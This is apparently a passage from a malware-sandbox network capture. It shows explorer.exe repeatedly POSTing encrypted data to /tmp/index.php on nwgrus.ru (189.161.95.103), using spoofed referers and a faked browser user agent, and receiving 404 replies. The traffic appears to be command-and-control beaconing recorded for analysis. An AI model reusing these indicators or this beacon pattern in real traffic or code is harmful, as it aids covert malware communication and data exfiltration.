                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            25192.168.2.449761189.161.95.103802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:52:54.906866074 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://eodrfdbgkbdgmox.com/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 255
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:52:54.906898022 CEST255OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 45 55 b1 e8
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA -[k,vuEUnJ\jO88q<;eJ<L]P]~pX5oaP0%w&z4X2C9Hq0Z>>.
                                                                            Oct 14, 2024 01:52:55.999577999 CEST484INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:52:55 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            26192.168.2.449762189.161.95.103802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:52:56.008057117 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://cguufeaxdioixvo.net/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 276
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:52:56.008057117 CEST276OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 45 4e c6 8e
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA -[k,vuENjTk^0\d$X~CxDay;LZFdEEe!3|.NKe`E!~S#5`'7UhoGyiA\9
                                                                            Oct 14, 2024 01:52:57.098568916 CEST484INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:52:56 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            27192.168.2.449763189.161.95.103802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:52:57.114233971 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://hbtkpieyfdv.com/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 330
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:52:57.114264011 CEST330OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 79 4a bc e8
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA -[k,vuyJ]kqZDGbt9(lZUA?rR:#MC@QysI. =K=}["wkl{)7f.S7
                                                                            Oct 14, 2024 01:52:58.208302975 CEST484INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:52:58 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            28192.168.2.449766189.161.95.103802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:52:58.217596054 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://nannolqtxvdvgf.org/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 172
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:52:58.217612028 CEST172OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 40 2d a7 96
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA -[k,vu@-j;[`nfD>34^hP}T_#UH};:R$qj}?
                                                                            Oct 14, 2024 01:52:59.308052063 CEST484INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:52:59 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            29192.168.2.449772189.161.95.103802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:52:59.318584919 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://pjnfdjwducxdwna.com/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 316
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:52:59.318584919 CEST316OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 16 6b 2c 90 f5 76 0b 75 73 5d ce 85
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA -[k,vus]rUB;[rX$~"*iIY[B!6)VT(T."\2Y_D!`7~SE=d}O6jmn%.<
                                                                            Oct 14, 2024 01:53:00.410244942 CEST484INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:53:00 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            30192.168.2.449783189.161.95.103802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:53:00.418123960 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://bvawnwiwcpmgflx.org/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 124
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:53:00.418123960 CEST124OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 17 6b 2c 90 f5 76 0b 75 77 04 d6 f5
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA -[k,vuw&ynp|I5-p*Dy
                                                                            Oct 14, 2024 01:53:01.541305065 CEST484INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:53:01 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            31192.168.2.449789189.161.95.103802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:53:01.549936056 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://yocwufliskskpcvu.com/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 338
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:53:01.549978018 CEST338OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 14 6b 2c 90 f5 76 0b 75 38 3c ea ac
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA -[k,vu8<aHPMHTC~e.H|PJu/+:Q`{RT=%nP[U VxN]s&tZ'CW+d4?&
                                                                            Oct 14, 2024 01:53:02.669269085 CEST484INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:53:02 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            32192.168.2.449797189.161.95.103802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:53:02.678565979 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://bfjqfyqpqtyfp.com/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 222
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:53:02.678565979 CEST222OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 15 6b 2c 90 f5 76 0b 75 4d 22 ad e4
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA -[k,vuM"2maoqPqAQ4=rA'~R`&k4/#k-l @yqIMwU?:,6x{5
                                                                            Oct 14, 2024 01:53:03.768182993 CEST484INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:53:03 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            33192.168.2.449806189.161.95.103802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:53:03.778011084 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://xknbcflanypqj.net/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 273
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:53:03.778024912 CEST273OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 2a 6b 2c 90 f5 76 0b 75 57 41 d7 a2
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA -[*k,vuWAhPoX}j'z5_2[+KZiB+tPdv!a0<{)@@\1GkM|O1]h`<a?B
                                                                            Oct 14, 2024 01:53:04.904217958 CEST484INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:53:04 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close
